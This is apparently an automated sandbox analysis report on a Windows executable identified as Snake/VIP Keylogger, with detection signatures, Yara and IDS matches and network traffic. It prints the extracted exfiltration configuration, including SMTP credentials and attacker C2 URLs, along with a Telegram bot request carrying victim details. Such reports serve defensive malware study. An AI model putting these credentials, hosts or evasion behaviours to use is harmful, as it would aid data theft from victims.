Windows Analysis Report
VbcXXnmIwPPhh.exe

Overview

General Information

Sample name: VbcXXnmIwPPhh.exe
Analysis ID: 1519406
MD5: 401098a467fc699acb2d256da47fdace
SHA1: 87484e36df3eb0290178e4ab85b5566fb6f92b16
SHA256: c803bffcf528efc9a204a34a6a9285128f9dce25d165020fc37198d16ee50c11
Tags: exeMassLogger

Detection

Snake Keylogger, VIP Keylogger
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus detection for URL or domain
Found malware configuration
Malicious sample detected (through community Yara rule)
Yara detected AntiVM3
Yara detected Snake Keylogger
Yara detected Telegram RAT
Yara detected VIP Keylogger
.NET source code contains potential unpacker
.NET source code references suspicious native API functions
AI detected suspicious sample
Adds a directory exclusion to Windows Defender
Contains functionality to capture screen (.Net source)
Contains functionality to log keystrokes (.Net Source)
Loading BitLocker PowerShell Module
Machine Learning detection for sample
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Tries to detect the country of the analysis system (by using the IP)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Uses the Telegram API (likely for C&C communication)
Yara detected Generic Downloader
Abnormal high CPU Usage
Allocates memory with a write watch (potentially for evading sandboxes)
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Binary contains a suspicious time stamp
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a window with clipboard capturing capabilities
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Sigma detected: Powershell Defender Exclusion
Sigma detected: Suspicious Outbound SMTP Connections
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses SMTP (mail sending)
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses insecure TLS / SSL version for HTTPS connection
Yara detected Credential Stealer
Yara signature match

Classification

Name: 404 Keylogger, Snake Keylogger
Description: Snake Keylogger (aka 404 Keylogger) is a subscription-based keylogger that has many capabilities. The infostealer can steal a victim's sensitive information, log keystrokes, take screenshots and extract information from the system clipboard. It was initially released on a Russian hacking forum in August 2019. It is notable for its relatively unusual methods of data exfiltration, including via email, FTP, SMTP, Pastebin or the messaging app Telegram.
Attribution: No Attribution
Blogpost URLs:
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.404keylogger

AV Detection

Source: http://aborters.duckdns.org:8081 URL Reputation: Label: malware
Source: http://anotherarmy.dns.army:8081 URL Reputation: Label: malware
Source: 00000006.00000002.3715386141.0000000000402000.00000040.00000400.00020000.00000000.sdmp Malware Configuration Extractor: Snake Keylogger {"Exfil Mode": "SMTP", "Username": "legacylog@jhxkgroup.online", "Password": "7213575aceACE@@ ", "Host": "mail.jhxkgroup.online", "Port": "587", "Version": "4.4"}
Source: 0.2.VbcXXnmIwPPhh.exe.430a080.6.unpack Malware Configuration Extractor: VIP Keylogger {"Exfil Mode": "SMTP", "Email ID": "legacylog@jhxkgroup.online", "Password": "7213575aceACE@@ ", "Host": "mail.jhxkgroup.online", "Port": "587"}
Source: Submitted Sample Integrated Neural Analysis Model: Matched 100.0% probability
Source: VbcXXnmIwPPhh.exe Joe Sandbox ML: detected

Location Tracking

Source: unknown DNS query: name: reallyfreegeoip.org
Source: VbcXXnmIwPPhh.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: unknown HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.7:49705 version: TLS 1.0
Source: unknown HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.7:49726 version: TLS 1.2
Source: VbcXXnmIwPPhh.exe Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: Binary string: geWD.pdbSHA256 source: VbcXXnmIwPPhh.exe
Source: Binary string: geWD.pdb source: VbcXXnmIwPPhh.exe
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe Code function: 4x nop then jmp 0168F8E9h 6_2_0168F631
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe Code function: 4x nop then jmp 0168FD41h 6_2_0168FA88
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe Code function: 4x nop then jmp 06DF0D0Dh 6_2_06DF0B30
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe Code function: 4x nop then jmp 06DF1697h 6_2_06DF0B30
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe Code function: 4x nop then jmp 06DF31E0h 6_2_06DF2DC8
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe Code function: 4x nop then jmp 06DF2C19h 6_2_06DF2968
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe Code function: 4x nop then jmp 06DFE959h 6_2_06DFE6B0
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe Code function: 4x nop then jmp 06DFE501h 6_2_06DFE258
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe Code function: 4x nop then jmp 06DFE0A9h 6_2_06DFDE00
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe Code function: 4x nop then jmp 06DFF661h 6_2_06DFF3B8
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe Code function: 4x nop then jmp 06DFF209h 6_2_06DFEF60
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe Code function: 4x nop then jmp 06DFEDB1h 6_2_06DFEB08
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe Code function: 4x nop then jmp 06DFD3A1h 6_2_06DFD0F8
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe Code function: 4x nop then jmp 06DFCF49h 6_2_06DFCCA0
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe Code function: 4x nop then mov dword ptr [ebp-14h], 00000000h 6_2_06DF0040
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe Code function: 4x nop then jmp 06DFFAB9h 6_2_06DFF810
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe Code function: 4x nop then jmp 06DF31E0h 6_2_06DF2DBF
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe Code function: 4x nop then jmp 06DFDC51h 6_2_06DFD9A8
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe Code function: 4x nop then jmp 06DFD7F9h 6_2_06DFD550
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe Code function: 4x nop then jmp 06DF31E0h 6_2_06DF310E

Networking

Source: unknown DNS query: name: api.telegram.org
Source: Yara match File source: 6.2.VbcXXnmIwPPhh.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.VbcXXnmIwPPhh.exe.44a56e0.4.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.VbcXXnmIwPPhh.exe.430a080.6.raw.unpack, type: UNPACKEDPE
Source: global traffic TCP traffic: 192.168.2.7:49727 -> 217.12.218.219:587
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic HTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:528110%0D%0ADate%20and%20Time:%2027/09/2024%20/%2000:14:59%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20528110%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
Source: Joe Sandbox View IP Address: 132.226.8.169
Source: Joe Sandbox View IP Address: 149.154.167.220
Source: Joe Sandbox View IP Address: 217.12.218.219
Source: Joe Sandbox View ASN Name: TELEGRAMRU
Source: Joe Sandbox View ASN Name: ITLDC-NLUA
Source: Joe Sandbox View ASN Name: CLOUDFLARENETUS
Source: Joe Sandbox View JA3 fingerprint: 54328bd36c14bd82ddaa0c04b25ed9ad
Source: Joe Sandbox View JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
Source: unknown DNS query: name: checkip.dyndns.org
Source: unknown DNS query: name: reallyfreegeoip.org
Source: Network traffic Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.7:49707 -> 132.226.8.169:80
Source: Network traffic Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.7:49701 -> 132.226.8.169:80
Source: Network traffic Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.7:49712 -> 188.114.96.3:443
Source: Network traffic Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.7:49708 -> 188.114.96.3:443
Source: Network traffic Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.7:49715 -> 188.114.96.3:443
Source: Network traffic Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.7:49725 -> 188.114.96.3:443
Source: Network traffic Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.7:49706 -> 188.114.96.3:443
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global traffic DNS traffic detected: DNS query: checkip.dyndns.org
Source: global traffic DNS traffic detected: DNS query: reallyfreegeoip.org
Source: global traffic DNS traffic detected: DNS query: api.telegram.org
Source: global traffic DNS traffic detected: DNS query: mail.jhxkgroup.online
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Thu, 26 Sep 2024 11:44:23 GMTContent-Type: application/jsonContent-Length: 55Connection: closeStrict-Transport-Security: max-age=31536000; includeSubDomains; preloadAccess-Control-Allow-Origin: *Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
Source: VbcXXnmIwPPhh.exe, 00000006.00000002.3720383294.0000000003269000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://51.38.247.67:8081/_send_.php?L
Source: VbcXXnmIwPPhh.exe, 00000000.00000002.1270613564.0000000004279000.00000004.00000800.00020000.00000000.sdmp, VbcXXnmIwPPhh.exe, 00000006.00000002.3715386141.0000000000402000.00000040.00000400.00020000.00000000.sdmp String found in binary or memory: http://51.38.247.67:8081/_send_.php?LCapplication/x-www-form-urlencoded
Source: VbcXXnmIwPPhh.exe, 00000000.00000002.1270613564.0000000004279000.00000004.00000800.00020000.00000000.sdmp, VbcXXnmIwPPhh.exe, 00000006.00000002.3715386141.0000000000402000.00000040.00000400.00020000.00000000.sdmp, VbcXXnmIwPPhh.exe, 00000006.00000002.3720383294.00000000031B1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://aborters.duckdns.org:8081
Source: VbcXXnmIwPPhh.exe, 00000000.00000002.1270613564.0000000004279000.00000004.00000800.00020000.00000000.sdmp, VbcXXnmIwPPhh.exe, 00000006.00000002.3715386141.0000000000402000.00000040.00000400.00020000.00000000.sdmp, VbcXXnmIwPPhh.exe, 00000006.00000002.3720383294.00000000031B1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://anotherarmy.dns.army:8081
Source: VbcXXnmIwPPhh.exe, 00000006.00000002.3725754423.0000000006999000.00000004.00000020.00020000.00000000.sdmp, VbcXXnmIwPPhh.exe, 00000006.00000002.3725754423.00000000069F8000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0B
Source: VbcXXnmIwPPhh.exe, 00000006.00000002.3725754423.0000000006999000.00000004.00000020.00020000.00000000.sdmp, VbcXXnmIwPPhh.exe, 00000006.00000002.3725754423.0000000006960000.00000004.00000020.00020000.00000000.sdmp, VbcXXnmIwPPhh.exe, 00000006.00000002.3725754423.00000000069F8000.00000004.00000020.00020000.00000000.sdmp, VbcXXnmIwPPhh.exe, 00000006.00000002.3720383294.0000000003269000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://cacerts.digicert.com/RapidSSLGlobalTLSRSA4096SHA2562022CA1.crt0
Source: VbcXXnmIwPPhh.exe, 00000006.00000002.3720383294.00000000031B1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://checkip.dyndns.org/
Source: VbcXXnmIwPPhh.exe, 00000000.00000002.1270613564.0000000004279000.00000004.00000800.00020000.00000000.sdmp, VbcXXnmIwPPhh.exe, 00000006.00000002.3715386141.0000000000402000.00000040.00000400.00020000.00000000.sdmp String found in binary or memory: http://checkip.dyndns.org/q
Source: VbcXXnmIwPPhh.exe, 00000006.00000002.3725754423.0000000006999000.00000004.00000020.00020000.00000000.sdmp, VbcXXnmIwPPhh.exe, 00000006.00000002.3725754423.00000000069F8000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
Source: VbcXXnmIwPPhh.exe, 00000006.00000002.3725754423.0000000006999000.00000004.00000020.00020000.00000000.sdmp, VbcXXnmIwPPhh.exe, 00000006.00000002.3725754423.0000000006960000.00000004.00000020.00020000.00000000.sdmp, VbcXXnmIwPPhh.exe, 00000006.00000002.3725754423.00000000069F8000.00000004.00000020.00020000.00000000.sdmp, VbcXXnmIwPPhh.exe, 00000006.00000002.3720383294.0000000003269000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://crl3.digicert.com/RapidSSLGlobalTLSRSA4096SHA2562022CA1.crl0H
Source: VbcXXnmIwPPhh.exe, 00000006.00000002.3725754423.0000000006960000.00000004.00000020.00020000.00000000.sdmp, VbcXXnmIwPPhh.exe, 00000006.00000002.3725754423.00000000069F8000.00000004.00000020.00020000.00000000.sdmp, VbcXXnmIwPPhh.exe, 00000006.00000002.3720383294.0000000003269000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://crl4.digicert.com/RapidSSLGlobalTLSRSA4096SHA2562022CA1.crl0
Source: VbcXXnmIwPPhh.exe, 00000006.00000002.3718826716.00000000013E6000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en
Source: VbcXXnmIwPPhh.exe, 00000006.00000002.3725754423.0000000006960000.00000004.00000020.00020000.00000000.sdmp, 77EC63BDA74BD0D0E0426DC8F80085060.6.dr String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab
Source: VbcXXnmIwPPhh.exe, 00000006.00000002.3725754423.0000000006999000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab;
Source: VbcXXnmIwPPhh.exe, 00000006.00000002.3725754423.0000000006999000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab?bba7b30f77af5
Source: VbcXXnmIwPPhh.exe, 00000006.00000002.3725754423.0000000006999000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cabH
Source: VbcXXnmIwPPhh.exe, 00000006.00000002.3725754423.0000000006960000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ctldl.windowsupdate.com:80/msdownload/update/v3/static/trustedr/en/authrootstl.cab?bba7b30f77
Source: VbcXXnmIwPPhh.exe, 00000006.00000002.3725754423.0000000006999000.00000004.00000020.00020000.00000000.sdmp, VbcXXnmIwPPhh.exe, 00000006.00000002.3725754423.00000000069F8000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ocsp.digicert.com0
Source: VbcXXnmIwPPhh.exe, 00000006.00000002.3725754423.0000000006999000.00000004.00000020.00020000.00000000.sdmp, VbcXXnmIwPPhh.exe, 00000006.00000002.3725754423.0000000006960000.00000004.00000020.00020000.00000000.sdmp, VbcXXnmIwPPhh.exe, 00000006.00000002.3725754423.00000000069F8000.00000004.00000020.00020000.00000000.sdmp, VbcXXnmIwPPhh.exe, 00000006.00000002.3720383294.0000000003269000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://ocsp.digicert.com0Q
Source: VbcXXnmIwPPhh.exe, 00000000.00000002.1268385420.00000000032C7000.00000004.00000800.00020000.00000000.sdmp, VbcXXnmIwPPhh.exe, 00000006.00000002.3720383294.00000000031B1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: VbcXXnmIwPPhh.exe, 00000000.00000002.1270613564.0000000004279000.00000004.00000800.00020000.00000000.sdmp, VbcXXnmIwPPhh.exe, 00000006.00000002.3715386141.0000000000402000.00000040.00000400.00020000.00000000.sdmp, VbcXXnmIwPPhh.exe, 00000006.00000002.3720383294.00000000031B1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://varders.kozow.com:8081
Source: VbcXXnmIwPPhh.exe, 00000006.00000002.3725754423.0000000006999000.00000004.00000020.00020000.00000000.sdmp, VbcXXnmIwPPhh.exe, 00000006.00000002.3725754423.0000000006960000.00000004.00000020.00020000.00000000.sdmp, VbcXXnmIwPPhh.exe, 00000006.00000002.3725754423.00000000069F8000.00000004.00000020.00020000.00000000.sdmp, VbcXXnmIwPPhh.exe, 00000006.00000002.3720383294.0000000003269000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.digicert.com/CPS0
Source: VbcXXnmIwPPhh.exe, 00000006.00000002.3724038248.00000000041D1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: VbcXXnmIwPPhh.exe, 00000000.00000002.1270613564.0000000004279000.00000004.00000800.00020000.00000000.sdmp, VbcXXnmIwPPhh.exe, 00000006.00000002.3715386141.0000000000402000.00000040.00000400.00020000.00000000.sdmp, VbcXXnmIwPPhh.exe, 00000006.00000002.3720383294.000000000325B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://api.telegram.org/bot
Source: VbcXXnmIwPPhh.exe, 00000006.00000002.3724038248.00000000041D1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: VbcXXnmIwPPhh.exe, 00000006.00000002.3724038248.00000000041D1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: VbcXXnmIwPPhh.exe, 00000006.00000002.3724038248.00000000041D1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: VbcXXnmIwPPhh.exe, 00000006.00000002.3720383294.0000000003269000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://chrome.google.com/webstore?hl=en
Source: VbcXXnmIwPPhh.exe, 00000006.00000002.3724038248.00000000041D1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: VbcXXnmIwPPhh.exe, 00000006.00000002.3724038248.00000000041D1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: VbcXXnmIwPPhh.exe, 00000006.00000002.3724038248.00000000041D1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: VbcXXnmIwPPhh.exe, 00000000.00000002.1270613564.0000000004279000.00000004.00000800.00020000.00000000.sdmp, VbcXXnmIwPPhh.exe, 00000006.00000002.3715386141.0000000000402000.00000040.00000400.00020000.00000000.sdmp, VbcXXnmIwPPhh.exe, 00000006.00000002.3720383294.00000000031FD000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://reallyfreegeoip.org/xml/
Source: VbcXXnmIwPPhh.exe, 00000006.00000002.3724038248.00000000041D1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.ecosia.org/newtab/
Source: VbcXXnmIwPPhh.exe, 00000006.00000002.3724038248.00000000041D1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: VbcXXnmIwPPhh.exe, 00000006.00000002.3720383294.0000000003269000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.office.com/

Key, Mouse, Clipboard, Microphone and Screen Capturing

Source: 0.2.VbcXXnmIwPPhh.exe.44a56e0.4.raw.unpack, COVID19.cs .Net Code: TakeScreenshot
Source: 0.2.VbcXXnmIwPPhh.exe.430a080.6.raw.unpack, COVID19.cs .Net Code: TakeScreenshot
Source: 0.2.VbcXXnmIwPPhh.exe.44a56e0.4.raw.unpack, COVID19.cs .Net Code: VKCodeToUnicode
Source: 0.2.VbcXXnmIwPPhh.exe.430a080.6.raw.unpack, COVID19.cs .Net Code: VKCodeToUnicode
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe Window created: window name: CLIPBRDWNDCLASS

System Summary

Source: 6.2.VbcXXnmIwPPhh.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 6.2.VbcXXnmIwPPhh.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 6.2.VbcXXnmIwPPhh.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 0.2.VbcXXnmIwPPhh.exe.44a56e0.4.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 0.2.VbcXXnmIwPPhh.exe.430a080.6.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 0.2.VbcXXnmIwPPhh.exe.44a56e0.4.unpack, type: UNPACKEDPE Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 0.2.VbcXXnmIwPPhh.exe.430a080.6.unpack, type: UNPACKEDPE Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 0.2.VbcXXnmIwPPhh.exe.44a56e0.4.unpack, type: UNPACKEDPE Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 0.2.VbcXXnmIwPPhh.exe.430a080.6.unpack, type: UNPACKEDPE Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 0.2.VbcXXnmIwPPhh.exe.44a56e0.4.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 0.2.VbcXXnmIwPPhh.exe.44a56e0.4.raw.unpack, type: UNPACKEDPE Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 0.2.VbcXXnmIwPPhh.exe.430a080.6.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 0.2.VbcXXnmIwPPhh.exe.430a080.6.raw.unpack, type: UNPACKEDPE Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 00000006.00000002.3715386141.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 00000000.00000002.1270613564.0000000004279000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: Process Memory Space: VbcXXnmIwPPhh.exe PID: 6212, type: MEMORYSTR Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: Process Memory Space: VbcXXnmIwPPhh.exe PID: 4888, type: MEMORYSTR Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe Process Stats: CPU usage > 49%
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe Memory allocated: 75DE0000 page read and write
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe Memory allocated: 77DA0000 page read and write
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe Code function: 0_2_0308DE4C 0_2_0308DE4C
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe Code function: 0_2_0AB106A8 0_2_0AB106A8
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe Code function: 0_2_0AB132C8 0_2_0AB132C8
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe Code function: 0_2_0AB10698 0_2_0AB10698
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe Code function: 6_2_0168C146 6_2_0168C146
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe Code function: 6_2_01687118 6_2_01687118
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe Code function: 6_2_0168A088 6_2_0168A088
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe Code function: 6_2_01685362 6_2_01685362
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe Code function: 6_2_0168D278 6_2_0168D278
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe Code function: 6_2_0168C468 6_2_0168C468
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe Code function: 6_2_0168C738 6_2_0168C738
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe Code function: 6_2_016869A0 6_2_016869A0
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe Code function: 6_2_0168E988 6_2_0168E988
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe Code function: 6_2_0168CA08 6_2_0168CA08
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe Code function: 6_2_0168CCD8 6_2_0168CCD8
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe Code function: 6_2_0168CFAB 6_2_0168CFAB
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe Code function: 6_2_01683E09 6_2_01683E09
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe Code function: 6_2_0168F631 6_2_0168F631
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe Code function: 6_2_0168E97B 6_2_0168E97B
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe Code function: 6_2_01683AB1 6_2_01683AB1
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe Code function: 6_2_0168FA88 6_2_0168FA88
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe Code function: 6_2_06DF1E80 6_2_06DF1E80
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe Code function: 6_2_06DF17A0 6_2_06DF17A0
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe Code function: 6_2_06DF0B30 6_2_06DF0B30
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe Code function: 6_2_06DF9C70 6_2_06DF9C70
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe Code function: 6_2_06DF5028 6_2_06DF5028
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe Code function: 6_2_06DF9548 6_2_06DF9548
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe Code function: 6_2_06DF2968 6_2_06DF2968
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe Code function: 6_2_06DFEAF8 6_2_06DFEAF8
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe Code function: 6_2_06DFE6B0 6_2_06DFE6B0
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe Code function: 6_2_06DFE6AF 6_2_06DFE6AF
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe Code function: 6_2_06DFE258 6_2_06DFE258
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe Code function: 6_2_06DFE249 6_2_06DFE249
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe Code function: 6_2_06DF1E77 6_2_06DF1E77
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe Code function: 6_2_06DFDE00 6_2_06DFDE00
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe Code function: 6_2_06DF1793 6_2_06DF1793
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe Code function: 6_2_06DF8B93 6_2_06DF8B93
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe Code function: 6_2_06DFF3B8 6_2_06DFF3B8
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe Code function: 6_2_06DF8BA0 6_2_06DF8BA0
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe Code function: 6_2_06DFEF51 6_2_06DFEF51
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe Code function: 6_2_06DFEF60 6_2_06DFEF60
